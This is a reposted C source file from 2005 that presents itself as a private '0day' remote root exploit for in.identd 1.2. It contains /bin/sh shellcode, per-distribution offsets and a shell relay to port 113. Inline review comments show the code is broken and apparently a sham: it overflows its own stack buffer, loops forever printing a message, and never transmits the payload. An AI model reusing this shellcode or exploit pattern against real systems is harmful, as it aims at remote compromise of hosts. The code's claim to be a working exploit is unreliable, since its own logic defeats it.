identd 1.2 remote exploit
来源:hacker.bob@sc.am 作者:japboy 发布时间:2005-12-23  

/*
* identd-0day.c - in.identd 1.2 remote exploit
*
* by japboy <hacker.bob@sc.am>
*
* Compile: gcc -o identd-0day identd-0day.c
*
* PRIVATE PRIVATE PRIVATE PRIVATE
* 0DAY 0DAY 0DAY 0DAY 0DAY
*
*/

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Command text; in this file it is used only to initialise the `sent`
 * array inside sendshellcode(). */
#define COMMAND "uname -a;id;uptime;"

/* Linux/x86 `int 0x80` byte sequence that ends in the literal "/bin/sh".
 * It is copied into a local buffer by sendshellcode(); the write() call in
 * that function is unreachable, so this program never transmits it. */
char *shellcode =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x16\x31\xdb\x31"
    "\xc9\xf7\xe1\x5b\xb0\x0b\x88\x53\x07\x52\x53\x89\xe1\xcd\x80"
    "\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh";

/* Table of selectable "targets". Only `name` (usage) and `offset`
 * (sendshellcode) are read in this file; `chunk` is never referenced. */
struct os {
    char *name;
    int offset;
    int chunk;
} oss[] = {
    { .name = "Red Hat 8.0 (Psyche)", .offset = 0x8622067, .chunk = 0x420158d4 },
    { .name = "Slackware 8.1",        .offset = 0x86f3d61, .chunk = 0x420158d4 },
    { .name = "Mandrake Linux 8.2",   .offset = 0x8622079, .chunk = 0x420158d4 }
};

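/*
 * Print the command-line synopsis followed by one numbered line per entry
 * of the oss[] table.
 *
 * a: program name shown in the synopsis (main passes argv[0]).
 */
void usage(char *a) {
    /* Derive the entry count from the table instead of hard-coding 3, so the
     * listing cannot run past or fall short of oss[] if it is edited. */
    int count = (int)(sizeof(oss) / sizeof(oss[0]));
    int i;

    printf("%s [host] [os]\n", a);
    for (i = 0; i < count; i++) {
        printf("\t%d - %s\n", i, oss[i].name);
    }
}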

/*
 * Fills a 512-byte stack buffer with NOP bytes and the global shellcode,
 * stores further bytes beyond the end of that buffer, then prints `sent`
 * in a loop. As written it never transmits anything on `sock`.
 *
 * sock: connected socket descriptor; referenced only by the write() call
 *       below, which is unreachable.
 * ost:  base index into oss[]; entries ost, ost+1 and ost+2 are read.
 *
 * NOTE(review): the function has undefined behaviour (out-of-bounds stack
 * writes) and does not return; see the inline notes. What it prints depends
 * on the compiler's stack layout.
 */
void sendshellcode(int sock,int ost) {
unsigned char sent[]=COMMAND;
unsigned char buffer[512];

int i,j,p,size=sizeof(buffer);
unsigned int ret;

/* NOTE(review): size+10 bytes are written into a size-byte array, i.e. 10
 * bytes past the end of buffer (undefined behaviour). */
memset(buffer,0x90,size+10); /* Fill empty space */

/* Places the shellcode in the last strlen(shellcode) bytes of buffer. */
memcpy((buffer+size)-strlen(shellcode),shellcode,strlen(shellcode)); /* Copy shellcode last*/

/* Fill with offset */
/* NOTE(review): every index below is >= size, so all 19 stores land outside
 * buffer. The first loop subtracts 0x88 from the 10 bytes set to 0x90 by the
 * memset above (0x90 - 0x88 = 0x08). */
for (i=0,p=0;i<10;i++) buffer[size+p++]-=0x88;
/* Stores 9 bytes taken from bytes 2, 1, 0 of oss[ost..ost+2].offset. With
 * the table values in this file and a little-endian host those bytes are
 * printable ASCII, not address bytes. Presumably the stores are meant to
 * reach `sent` -- that depends on stack layout; confirm. With ost != 0 the
 * oss[ost+i] read goes past the 3-entry table. */
for (j=2;j>=0;j--) for (i=0;i<3;i++) buffer[size+p++]=((char*)&oss[ost+i].offset)[j];

/* Write to socket */
/* NOTE(review): the for(;;) has no braces, so its body is the printf alone.
 * The loop never ends and the write() below is unreachable: nothing is sent
 * to the peer. */
for(;;)
printf("[x] Sent: %s\n",sent);
/* NOTE(review): ret is unsigned int, so `< 0` can never be true even if this
 * statement were reached. */
if ((ret=write(sock,buffer,size)) < 0) {
printf("[x] Unable to send shellcode\n");
exit(0);
}
}

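/*
 * Relay lines from stdin to `sock` and bytes from `sock` to stdout.
 *
 * Returns when the peer closes the connection ("Good Bye!" is printed),
 * when read/write/select fails (the error is reported with perror), or when
 * stdin reaches end-of-file.
 *
 * sock: connected socket descriptor.
 */
void sh(int sock) {
    char rcv[1024];
    fd_set rset;
    int in_fd = fileno(stdin);
    int maxfd = ((in_fd > sock) ? in_fd : sock) + 1;
    ssize_t n;

    /* Main command loop */
    for (;;) {
        /* select() overwrites the set on return and the set starts out
         * uninitialised, so rebuild it from empty on every pass. */
        FD_ZERO(&rset);
        FD_SET(in_fd, &rset);
        FD_SET(sock, &rset);

        if (select(maxfd, &rset, NULL, NULL, NULL) < 0) {
            if (errno == EINTR) {
                continue;
            }
            perror("select");
            return;
        }

        if (FD_ISSET(in_fd, &rset)) {
            /* Stop on stdin EOF instead of spinning on empty writes. */
            if (fgets(rcv, sizeof(rcv), stdin) == NULL) {
                return;
            }
            if (write(sock, rcv, strlen(rcv)) < 0) {
                perror("write");
                return;
            }
        }

        if (FD_ISSET(sock, &rset)) {
            n = read(sock, rcv, sizeof(rcv));
            if (n == 0) {
                printf("Good Bye!\n");
                return;
            }
            if (n < 0) {
                perror("read");
                return;
            }

            /* Emit exactly the n bytes received: the data is not
             * NUL-terminated, so a string function could read past rcv
             * when the buffer is completely filled. */
            fwrite(rcv, 1, (size_t)n, stdout);
            fflush(stdout); /* keeps output nice */
        }
    }
}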

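/*
 * Entry point: parse [host] and [os], open a TCP connection to port 113 on
 * the host, then call sendshellcode() and sh().
 *
 * argv[1]: dotted-quad address or host name.
 * argv[2]: numeric index into oss[]; see the clamp note below.
 *
 * Prints usage and exits with status 1 when either argument is missing.
 * Socket, resolver and connect failures print a "[x]" message and exit with
 * status 0, as in the original.
 */
int main(int argc, char **argv) {
    int sock;
    int rc;
    unsigned int ost;
    in_addr_t addr;
    struct sockaddr_in in;
    struct hostent *hp;

    /* argv[1] and argv[2] are both read below, so both must be present;
     * with only one argument argv[2] is NULL and atol() would dereference it. */
    if (argc < 3) {
        usage(argv[0]);
        exit(1);
    }

    ost = atol(argv[2]);
    /* The two clamps run in sequence, so every non-zero selection ends up
     * as 0. sendshellcode() reads oss[ost], oss[ost+1] and oss[ost+2], so a
     * non-zero value would index past the 3-entry table. */
    if (ost > 2) ost = 2;
    if (ost > 0) ost = 0;

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        printf("[x] Error creating socket\n");
        exit(0);
    }

    /* Start from a fully zeroed address so no stack garbage is passed to
     * connect() in the padding bytes. */
    bzero((char *)&in, sizeof(in));

    addr = inet_addr(argv[1]);
    if (addr == 0 || addr == (in_addr_t)-1) {
        /* Not a usable dotted-quad: fall back to a name lookup. */
        if ((hp = gethostbyname(argv[1])) == NULL) {
            printf("[x] Error resolving host\n");
            exit(0);
        }
        /* Only copy an address that is IPv4 and exactly fits sin_addr. */
        if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof(in.sin_addr)) {
            printf("[x] Error resolving host\n");
            exit(0);
        }
        bcopy((char *)hp->h_addr, (char *)&in.sin_addr, sizeof(in.sin_addr));
    } else {
        in.sin_addr.s_addr = addr;
    }
    in.sin_family = AF_INET;
    in.sin_port = htons(113);

    printf("[x] Trying to connect\n");
    /* Keep the result in a signed int: stored in an unsigned variable the
     * `< 0` test is always false and a failed connect goes unnoticed. */
    rc = connect(sock, (struct sockaddr *)&in, sizeof(in));
    if (rc < 0) {
        printf("[x] Error connecting to host\n");
        exit(0);
    }
    printf("[x] Connected....\n");

    sendshellcode(sock, ost);
    sh(sock);
    return 0;
}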

// Bulgarian DarkNet [200x]
// http://DarkNet.pH/



 